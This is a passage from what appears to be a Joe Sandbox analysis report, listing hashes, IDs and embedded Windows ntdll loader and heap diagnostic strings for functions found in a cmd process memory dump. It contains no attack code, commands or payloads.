                                                                        • Opcode Fuzzy Hash: f106b9a39fd311cd8c06e7f73bb74d694f1af47885c03487f6259c64d4068c56
                                                                        • Instruction Fuzzy Hash: 25A18D35A012299FCB24DF64D884BA9B3B5BF5D314F1949EAD808AB251D730DEC2CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0317342A
                                                                        • RtlDeactivateActivationContext, xrefs: 03173425, 03173432, 03173451
                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 03173456
                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 03173437
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                        • API String ID: 0-1245972979
                                                                        • Opcode ID: 17bf3b2d5640c887f31f11e032afc17f6dfbf513c3a5884adf66c747050dd9f7
                                                                        • Instruction ID: f9b45af199f043b79ba6e572c411a82f0bcb31e62e998a6b1e77aef8c4008466
                                                                        • Opcode Fuzzy Hash: 17bf3b2d5640c887f31f11e032afc17f6dfbf513c3a5884adf66c747050dd9f7
                                                                        • Instruction Fuzzy Hash: 6E6123366047019FC72ACF19C841B2AF3A5EF89B50F1D8969E8669F280CB30E841CBD1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 03161028
                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 03160FE5
                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0316106B
                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 031610AE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                        • API String ID: 0-1468400865
                                                                        • Opcode ID: 4dfa051b5e0b54e0897f26d7518bba57347baa8a6c1a509af6e4015bb45e97f1
                                                                        • Instruction ID: 79999f54e1a499dcb1b45f5df022e26071ec9ee94e080c567935e27df45a82cc
                                                                        • Opcode Fuzzy Hash: 4dfa051b5e0b54e0897f26d7518bba57347baa8a6c1a509af6e4015bb45e97f1
                                                                        • Instruction Fuzzy Hash: EC71BEB5904344AFCB20EF54C884B9B7BACEF4D7A4F4404A8F9488B286D774D599CBD2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • LdrpDynamicShimModule, xrefs: 0316A998
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0316A9A2
                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0316A992
                                                                        • apphelp.dll, xrefs: 03122462
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-176724104
                                                                        • Opcode ID: 12229ff720cb681bf1e38b9a8e8aeff48d2761660bb7b7dd5ceaaf6ddfba862d
                                                                        • Instruction ID: 51899a6fc28cbdd94ea4a804ce425cdbf6c4a76385ead250124e8b0c05f9e2fd
                                                                        • Opcode Fuzzy Hash: 12229ff720cb681bf1e38b9a8e8aeff48d2761660bb7b7dd5ceaaf6ddfba862d
                                                                        • Instruction Fuzzy Hash: C2311AB5600341AFD728FF99D841A6EB7B9EF8C700F2A045AE5117B244C7B098D2CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • HEAP[%wZ]: , xrefs: 03113255
                                                                        • HEAP: , xrefs: 03113264
                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0311327D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                        • API String ID: 0-617086771
                                                                        • Opcode ID: 95b297f7a111509a65a5b04ae08e9c8bb4e285061a86c7b1ad3bb8133678062e
                                                                        • Instruction ID: 4883d556e5175b687045be84e95f14a72a6cabb316d3e77edbe7a17b29d5306e
                                                                        • Opcode Fuzzy Hash: 95b297f7a111509a65a5b04ae08e9c8bb4e285061a86c7b1ad3bb8133678062e
                                                                        • Instruction Fuzzy Hash: D692CD75A042489FDB29CF68C4407EEBBF1FF4C300F1888A9E859AB255D735A996CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-4253913091
                                                                        • Opcode ID: 02b36ada0e6c5e88d91e05d593f6ac0e062b80fb15ae0b58b8a4dbbacf925504
                                                                        • Instruction ID: 3f7d02c65ae2b7b8e31031e704a59597fb315b3d58053b616ca97b211703eabf
                                                                        • Opcode Fuzzy Hash: 02b36ada0e6c5e88d91e05d593f6ac0e062b80fb15ae0b58b8a4dbbacf925504
                                                                        • Instruction Fuzzy Hash: F2F1A034A00605DFDB19DFA8C894BAAB7F6FF4D304F1841A9E4569B381D734E9A1CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: $@
                                                                        • API String ID: 2994545307-1077428164
                                                                        • Opcode ID: fe63f1e364a3c5afbf3f01b19e7e6ee46294743c2e9f59c938c9c31cabc33d78
                                                                        • Instruction ID: 3b5b1a9539d02f90129d2f64614e44ff0906ace99c48a001d927b29867191c6b
                                                                        • Opcode Fuzzy Hash: fe63f1e364a3c5afbf3f01b19e7e6ee46294743c2e9f59c938c9c31cabc33d78
                                                                        • Instruction Fuzzy Hash: 90C29F716083519FDB29CF65C880BABBBE5AF8C304F09892DE9C9C7281D774D854CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                        • API String ID: 0-2779062949
                                                                        • Opcode ID: 53672dfb265da55dd222eed4cb3a13207129832166afd236a6391d145f8485a0
                                                                        • Instruction ID: ce616c0b7e53d2535872940d44b1099ee19c088d2b66de18be8d929c0079f052
                                                                        • Opcode Fuzzy Hash: 53672dfb265da55dd222eed4cb3a13207129832166afd236a6391d145f8485a0
                                                                        • Instruction Fuzzy Hash: D0A16C75A016299BDB71DF24CC88BEAB7B8EF48700F1401E9E919AB250D7359EC5CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0316A121
                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0316A10F
                                                                        • LdrpCheckModule, xrefs: 0316A117
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-161242083
                                                                        • Opcode ID: ad55030f8b318b098f8b6fb9bf95e95ca0f283a6744b39550a4d8132ca16b838
                                                                        • Instruction ID: 13bcb9b110f0233638f5dfa32e98f51d9173f3bf15333d69352670c6fc01fe7a
                                                                        • Opcode Fuzzy Hash: ad55030f8b318b098f8b6fb9bf95e95ca0f283a6744b39550a4d8132ca16b838
                                                                        • Instruction Fuzzy Hash: 0A71D4B4A00605DFCB18EFA8C980ABEBBF4EF4C304F1945ADD512AB255D735ADA1CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-1334570610
                                                                        • Opcode ID: 9f8372ee8a2e6d73fcbf272e8b705de31553ace1658b5a7feb87de97fe012269
                                                                        • Instruction ID: 71ed7c0370a5d0b3943529c8125e56b3633a13c7e95de2f1ce861fcc1be5db2d
                                                                        • Opcode Fuzzy Hash: 9f8372ee8a2e6d73fcbf272e8b705de31553ace1658b5a7feb87de97fe012269
                                                                        • Instruction Fuzzy Hash: 6461AE74A01305DFDB28CF24C440BAABBE5FF4D708F1984A9E4558F292D770E8A1CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • Failed to reallocate the system dirs string !, xrefs: 031782D7
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 031782E8
                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 031782DE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1783798831
                                                                        • Opcode ID: 4882ae141498cb56f6c2c3295ff686e2d17bd5f6e6be8af0b11893c1cf8bb5a1
                                                                        • Instruction ID: a2611fd1f1c860a9234f8cd6f2d8272600cc3baec5b6f49e411476830249347f
                                                                        • Opcode Fuzzy Hash: 4882ae141498cb56f6c2c3295ff686e2d17bd5f6e6be8af0b11893c1cf8bb5a1
                                                                        • Instruction Fuzzy Hash: 5E41A1B9645310AFC724FB64D845B5BB7F8EF4D750F08492AB958EB250EB70D840CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • PreferredUILanguages, xrefs: 031BC212
                                                                        • @, xrefs: 031BC1F1
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 031BC1C5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                        • API String ID: 0-2968386058
                                                                        • Opcode ID: ccca07c216bae80d2c293291cb6b6b8c6df138f84f2a1066ea5ae2ae99cb211b
                                                                        • Instruction ID: 9fd9f9b436f87bd0a560e568a4af327168cf9f9591d34759be775fc11bd7684a
                                                                        • Opcode Fuzzy Hash: ccca07c216bae80d2c293291cb6b6b8c6df138f84f2a1066ea5ae2ae99cb211b
                                                                        • Instruction Fuzzy Hash: 58416D76E00209AFDB11DAD4C881BEEB7BDAB5C700F1440AAE945FB290D7749A458BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                        • API String ID: 0-1373925480
                                                                        • Opcode ID: 101165fbcefaef0101dc1c337a1017bc93c9788b90935e83b18cfdf534cf479d
                                                                        • Instruction ID: 326e6eb5a1b76e4f807d53718e4c37da582968b5e95c1bfebaf7c58ec8108dad
                                                                        • Opcode Fuzzy Hash: 101165fbcefaef0101dc1c337a1017bc93c9788b90935e83b18cfdf534cf479d
                                                                        • Instruction Fuzzy Hash: 7041ED369007588BEF26DBE6D840BADB7B9FF4D340F19046AD811AF791DB349942CB10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • LdrpCheckRedirection, xrefs: 0318488F
                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03184888
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 03184899
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-3154609507
                                                                        • Opcode ID: e56e47b7a06b2f7c116d62ed124304e7173cb136aa3c0fb5c15a53faf26510df
                                                                        • Instruction ID: 303a44285fd67acf62f414d766c3aa5e33dc67ebf292e59a9ad66b25e8fcc4fa
                                                                        • Opcode Fuzzy Hash: e56e47b7a06b2f7c116d62ed124304e7173cb136aa3c0fb5c15a53faf26510df
                                                                        • Instruction Fuzzy Hash: 6341C6326047529FCB21EF9AD440A26B7E4EF4EB50F0A095DED949B215DF30D840CF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-2558761708
                                                                        • Opcode ID: 609ff624d3e4009593a1733bc9a0b3f7f8db861003fd5c70b1104976689ad35a
                                                                        • Instruction ID: bf324457151d8fa6bd38d7a14d636aa64b764ec88e414717d4b1fdb188ac895d
                                                                        • Opcode Fuzzy Hash: 609ff624d3e4009593a1733bc9a0b3f7f8db861003fd5c70b1104976689ad35a
                                                                        • Instruction Fuzzy Hash: B4110F347162018FCB1CCA15C880BBAB3AAEF4E619F1980A9E406CF251EB34D8E0C755
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 03182104
                                                                        • Process initialization failed with status 0x%08lx, xrefs: 031820F3
                                                                        • LdrpInitializationFailure, xrefs: 031820FA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2986994758
                                                                        • Opcode ID: ff809986c3221940e38256b621847b3d5cb5b4719813e431d0679eb571d5e690
                                                                        • Instruction ID: 5a8cf3f3c5bcdf9f505b3598f518b2b017ad89be1a5aa2f8823776b175bb561e
                                                                        • Opcode Fuzzy Hash: ff809986c3221940e38256b621847b3d5cb5b4719813e431d0679eb571d5e690
                                                                        • Instruction Fuzzy Hash: A2F02278741708BFD728FB08CD02F9977BCEB48B44F640858F6006B281D7B0E941CAA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: #%u
                                                                        • API String ID: 48624451-232158463
                                                                        • Opcode ID: 2bd461076f9e8facd85f5b4d780b1db070973b6d4878a22cd5942bfac9f81c44
                                                                        • Instruction ID: aa32a522d5a3d0fc2885f1f6e3ffb96cb68d927731dab8f3e5f6407ce1d7cd16
                                                                        • Opcode Fuzzy Hash: 2bd461076f9e8facd85f5b4d780b1db070973b6d4878a22cd5942bfac9f81c44
                                                                        • Instruction Fuzzy Hash: D3714875A0024A9FDB05DFA9C980BEEB7B8EF0C744F154065E905EB251EB34ED51CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • LdrResSearchResource Exit, xrefs: 0310AA25
                                                                        • LdrResSearchResource Enter, xrefs: 0310AA13
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                        • API String ID: 0-4066393604
                                                                        • Opcode ID: b3aae510470128c7355ebb3330b721b4dd801b6a31635559acc808d6ae9be8ca
                                                                        • Instruction ID: a4b9a3bf11cc2f694d666f17df2a092c8ccdebab1d284457b2b4c74553f87ed3
                                                                        • Opcode Fuzzy Hash: b3aae510470128c7355ebb3330b721b4dd801b6a31635559acc808d6ae9be8ca
                                                                        • Instruction Fuzzy Hash: C3E1AB75A00348EFEF25CED9C980BAEB7B9AF0C310F09446AE911EB2D0D7B49851CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction ID: 90545474409be8bdc2535937a8a930be14213f02066175ca51e40bcc01ba6310
                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction Fuzzy Hash: 5AC1D1312243899BDB26CF28C841B6BFBE5BFD8318F088A2DF595CA290D775E545CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        • Opcode ID: f776c684f3de2bc6a13d3126e1c4a6852a887c613df471b32380c5f942f95037
                                                                        • Instruction ID: eaf797ab838607eefe807bea6fc04191a96587668806a2dc1e3d6ffcb2be6c35
                                                                        • Opcode Fuzzy Hash: f776c684f3de2bc6a13d3126e1c4a6852a887c613df471b32380c5f942f95037
                                                                        • Instruction Fuzzy Hash: 90612D71E007189FDB18DFA9C950BAEBBF9FB48700F1844ADE559EB251D731A940CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$MUI
                                                                        • API String ID: 0-17815947
                                                                        • Opcode ID: c7606f7a5c8c94c2fe3b483a41fd95d3b384d2f2cda31fb2ad90ce898bc9ece0
                                                                        • Instruction ID: f2d0381561f9fdbc77802f7bc7c133f3bec02dd58d2dd070fe5c0d7b0a5464d9
                                                                        • Opcode Fuzzy Hash: c7606f7a5c8c94c2fe3b483a41fd95d3b384d2f2cda31fb2ad90ce898bc9ece0
                                                                        • Instruction Fuzzy Hash: DA513975E0061DAFDB11DFAACC80AEEFBB8EB48755F140529E511BB280DB709945CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
